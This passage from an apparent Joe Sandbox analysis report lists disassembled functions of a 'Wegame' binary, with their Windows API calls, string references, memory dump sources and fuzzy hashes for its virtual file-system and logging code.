                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002,00000000,00000021,00000000,Missing '}' or object member name,00000021,?,00000001), ref: 00438977
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002,00000000,ezC,00000000,Missing ':' after object member name,00000024), ref: 004389E4
                                                                  • Part of subcall function 0043A010: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A14D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memmove$malloc
                                                                • String ID: Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name$ezC
                                                                • API String ID: 3979066152-1887329830
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0041653C,?,?,-00000010,00000000,?,?,?,?,85A35C35), ref: 00416C6D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0041653C,?,?,-00000010,00000000,?,?,?,?,85A35C35), ref: 00416CC7
                                                                Strings
                                                                • VFileSysBase::DeleteFile() , xrefs: 0041C431
                                                                • VFileSysBase::DeleteFile() , xrefs: 0041C4A6
                                                                • VFileSysBase::DeleteFile() , xrefs: 0041C539
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturnfree
                                                                • String ID: VFileSysBase::DeleteFile() $VFileSysBase::DeleteFile() $VFileSysBase::DeleteFile()
                                                                • API String ID: 2293887081-1912354006
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 00402F02
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403029
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403087
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403107
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00403118
                                                                Strings
                                                                • VFSHelper::SetWorkDirectory() , xrefs: 0040309D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                                • String ID: VFSHelper::SetWorkDirectory()
                                                                • API String ID: 363805048-2983149126
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 0040A202
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A327
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A385
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001), ref: 0040A3F8
                                                                • LeaveCriticalSection.KERNEL32(?,?,00000001), ref: 0040A41D
                                                                Strings
                                                                • VFSHelper::OutputSequenceFile() , xrefs: 0040A39B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                                • String ID: VFSHelper::OutputSequenceFile()
                                                                • API String ID: 363805048-1191238597
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?,?,?,?,00471F38,000000FF), ref: 0040AE02
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00471F38,000000FF), ref: 0040AE30
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                Strings
                                                                • VFSHelper::UpdateKey() , xrefs: 0040B011
                                                                • VFSHelper::UpdateKey() vfsRoot, xrefs: 0040AEBB
                                                                • (VFS_DEFAULT_AES_KEY), xrefs: 0040AEEB
                                                                • VFSHelper::UpdateKey() , xrefs: 0040AE18
                                                                • VFSHelper::UpdateKey() vfs, xrefs: 0040AE95
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionmemset$DebugEnterLeaveOutputString
                                                                • String ID: (VFS_DEFAULT_AES_KEY)$VFSHelper::UpdateKey() $VFSHelper::UpdateKey() $VFSHelper::UpdateKey() vfs$VFSHelper::UpdateKey() vfsRoot
                                                                • API String ID: 1368408445-1847941951
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045070D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,0000009C), ref: 0045072C
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,0000009C), ref: 0045077F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 004507F3
                                                                Strings
                                                                • [TPF_UI], xrefs: 0045079F
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\inc\tpfuiloger.h, xrefs: 00450827
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3_U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@
                                                                • String ID: [TPF_UI]$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\inc\tpfuiloger.h
                                                                • API String ID: 1418758211-4018008984
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00448806
                                                                • memset.VCRUNTIME140(?,00000000,00000414,00000640), ref: 00448845
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0044888D
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,?,00000000,00000208), ref: 0044889F
                                                                • PathAppendW.SHLWAPI(?,?), ref: 004488B6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$AppendH_prolog3_Pathwcscpy_s
                                                                • String ID:
                                                                • API String ID: 3416047758-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043EDAA
                                                                  • Part of subcall function 0043DEA7: __EH_prolog3.LIBCMT ref: 0043DEAE
                                                                  • Part of subcall function 0043DEA7: ?directory_iterator_construct@detail@filesystem@ierd_tgp@@YAXAAVdirectory_iterator@23@ABVpath@23@PAVerror_code@std@@@Z.COMMON(?,?,?,00000010), ref: 0043DF05
                                                                • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 0043EE2A
                                                                • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,fileinfo.hash,?,?), ref: 0043EE41
                                                                • ?remove@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,?,?,00000000,?), ref: 0043EED1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Verror_code@std@@@$?directory_iterator_construct@detail@filesystem@ierd_tgp@@?filename@path@filesystem@ierd_tgp@@?remove@filesystem@ierd_tgp@@H_prolog3H_prolog3_V123@Vdirectory_iterator@23@Vpath@12@Vpath@23@_wcsicmp
                                                                • String ID: fileinfo.hash$login_pic\
                                                                • API String ID: 829375453-3670449923
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 0040A0A7
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040A193
                                                                  • Part of subcall function 00409BA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,85A35C35), ref: 00409DBC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A16E
                                                                  • Part of subcall function 004115A0: _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,85A35C35,?,?), ref: 004115F1
                                                                  • Part of subcall function 004115A0: SetFileAttributesW.KERNEL32(?,00000080), ref: 0041160E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_invalid_parameter_noinfo_noreturn$AttributesEnterFileLeave_waccess
                                                                • String ID: VFSHelper::EndLoadFileSet()$VFSHelper::EndLoadFileSet() $fileSetID
                                                                • API String ID: 2819506187-656408057
                                                                • Opcode ID: 8549c9656e4eb64d655d0b39d277df238e19626b317c59bc1663ee307650161e
                                                                • Instruction ID: 4a3a8ee7209b14212b81e4ff5782c8010debcbdd0a59d0ad95ed4eb7571dfb29
                                                                • Opcode Fuzzy Hash: 8549c9656e4eb64d655d0b39d277df238e19626b317c59bc1663ee307650161e
                                                                • Instruction Fuzzy Hash: FC311671A002099BCB04DF65D885BEEBBB5EF45324F20022BE511A73C0DB3C5998C79A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?), ref: 00402DC7
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402DE7
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402E02
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00402E3E
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402E58
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                Strings
                                                                • VFSHelper::Uninit() FileLoader, xrefs: 00402E1F
                                                                • VFSHelper::Uninit() VFSHelper, xrefs: 00402DCF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Entermemset$DebugOutputString
                                                                • String ID: VFSHelper::Uninit() FileLoader$VFSHelper::Uninit() VFSHelper
                                                                • API String ID: 2503103738-2689658810
                                                                • Opcode ID: e4280ca8eae778cd1af3a8105f35694687289ec8bc813dca21ad15d487d06bd6
                                                                • Instruction ID: 7d46fe32b367f48656aae9e18df92f9e7d53d3a528c4535c6d05a22ab6bb1db3
                                                                • Opcode Fuzzy Hash: e4280ca8eae778cd1af3a8105f35694687289ec8bc813dca21ad15d487d06bd6
                                                                • Instruction Fuzzy Hash: 78213732A04184AFDB00DF69EC04BCEBBB8EF56319F00017AE40853381DBB9264987E9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00402CFF
                                                                • CreateThread.KERNEL32 ref: 00402D3D
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402D55
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00402D80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leavememset$CreateDebugEnterOutputStringThread
                                                                • String ID: VFSHelper::Init() FileLoader$VFSHelper::Init() VFSHelper
                                                                • API String ID: 3707779055-153008969
                                                                • Opcode ID: dbac0a42dc97a11a5782e51cfd8ac956fa8ad244c4ed6206cadce99b849e9c20
                                                                • Instruction ID: b41cabd93e693adb520f8ce40c8524c4ae8f4b4289053b851d34fba29ff81475
                                                                • Opcode Fuzzy Hash: dbac0a42dc97a11a5782e51cfd8ac956fa8ad244c4ed6206cadce99b849e9c20
                                                                • Instruction Fuzzy Hash: 2711E971641241BAE7009F25EC48FC67B6CEF92318F041037F50497281C7B9999AC7ED
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00456BD3
                                                                • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000014,00000000,00000000,00000000,?,?,?,?,?,0000001C), ref: 00456BDE
                                                                • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,0000001C), ref: 00456BF6
                                                                • std::locale::_Getfacet.LIBCPMT ref: 00456C00
                                                                  • Part of subcall function 0044C734: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,00000000,?,004430B7,00000000), ref: 0044C759
                                                                • std::_Facet_Register.LIBCPMT ref: 00456C31
                                                                • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,?,?,0000001C), ref: 00456C51
                                                                • _CxxThrowException.VCRUNTIME140(?,004966C4,00000000,?,?,?,?,?,0000001C), ref: 00456C70
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowstd::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 2295579510-0
                                                                • Opcode ID: 7a0db9d83ec0b7c1fc0417cd69087db8e87b9df2bb2db8d5aa62a49486cd8507
                                                                • Instruction ID: da5ea7f2637aebbca816675167e180b4f4f980d0c216fc73710368e3723905e5
                                                                • Opcode Fuzzy Hash: 7a0db9d83ec0b7c1fc0417cd69087db8e87b9df2bb2db8d5aa62a49486cd8507
                                                                • Instruction Fuzzy Hash: DC11BE35800214DFCF15EFA4C8448AEBB74FF04315B14055EE815A33A2DB389A45CB49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(00000000,00000000,?,00000000,00000000), ref: 00415018
                                                                • memset.VCRUNTIME140(00000000,00000000,00001000,85A35C35,?,00000000,00000000), ref: 004150BE
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000), ref: 004150CD
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000), ref: 004150E3
                                                                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004150EF
                                                                • memmove.VCRUNTIME140(00000000,85A35C35,?,85A35C35,?,00000000,00000000), ref: 004150AA
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _errnomemset$_invalid_parameter_noinfomallocmemmove
                                                                • String ID:
                                                                • API String ID: 2221371199-0
                                                                • Opcode ID: 8f8bedea6191fb9d9228ab8b439284af1a0c2d2f50ed02c8933a3bd59319ff3c
                                                                • Instruction ID: b2885f98c78a51a8d02c9e78d7e384a1aceb273db22ab245a402808f979f4e27
                                                                • Opcode Fuzzy Hash: 8f8bedea6191fb9d9228ab8b439284af1a0c2d2f50ed02c8933a3bd59319ff3c
                                                                • Instruction Fuzzy Hash: B0B114B4A00606DFDB14CF19C880B9ABBE1FF89354F24C16EE9598B351D779E981CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,85A35C35,?,?), ref: 0040A8CB
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,-00000010,00000000,?,?,?), ref: 0040A8E8
                                                                • CloseHandle.KERNEL32(?), ref: 0040A965
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0040AC78
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo_noreturnfree
                                                                • String ID: DATA
                                                                • API String ID: 3691831780-2607161047
                                                                • Opcode ID: d521d9954a72f9a34c52c885197fb585e1eaa15de1ef91ab2fce970a6204007f
                                                                • Instruction ID: d8509d03ff4a2c80bc74afda0eea25527ea6faf85f33728b85c951f87899b873
                                                                • Opcode Fuzzy Hash: d521d9954a72f9a34c52c885197fb585e1eaa15de1ef91ab2fce970a6204007f
                                                                • Instruction Fuzzy Hash: 4302E171D042588FDB20CF28C944BAEBBB1BF45304F1981AAD449BB2D2DB38AD95CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
